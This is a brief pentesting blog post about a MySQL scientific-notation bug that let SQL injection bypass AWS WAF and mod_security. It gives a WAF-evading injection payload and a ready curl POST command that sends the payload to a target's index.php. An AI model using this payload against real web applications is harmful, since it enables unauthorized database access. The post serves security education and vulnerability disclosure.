Learn Pentesting like a Pro!

Share this post

Scientific Notation bug bypass AWS WAF protection

pentesting.academy

Discover more from Learn Pentesting like a Pro!

Stay updated on the latest cybersecurity insights from Cloud and Mobile to Blockchain. (HUNDREDS OF SUBSCRIBERS)
Continue reading
Sign in

Scientific Notation bug bypass AWS WAF protection

DH
Oct 29, 2021
Share this post

Scientific Notation bug bypass AWS WAF protection

pentesting.academy
Share

AWS WAF and mod_security Apache module were affected by a scientific notation bug discovered back in 2013 that allowed to bypass the WAF to successfully exploit a SQL injection vulnerability.

Find below the payload used for the attack showing the scientific notation:

"x=1' or 1.e(1) or '1'='1"

Executing the following command it was possible to bypass the WAF SQL injection protection and exploit a SQL injection on the underlying web application:

$ curl -i -H "Origin: http://domain" -X POST \
  "http://$DOMAIN/index.php" -d "x=1' or 1.e(1) or '1'='1"

More info:

https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.

Share this post

Scientific Notation bug bypass AWS WAF protection

pentesting.academy
Share
Previous
Next
Comments
Top
New

No posts

Ready for more?

© 2023 pentesting.academy
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great writing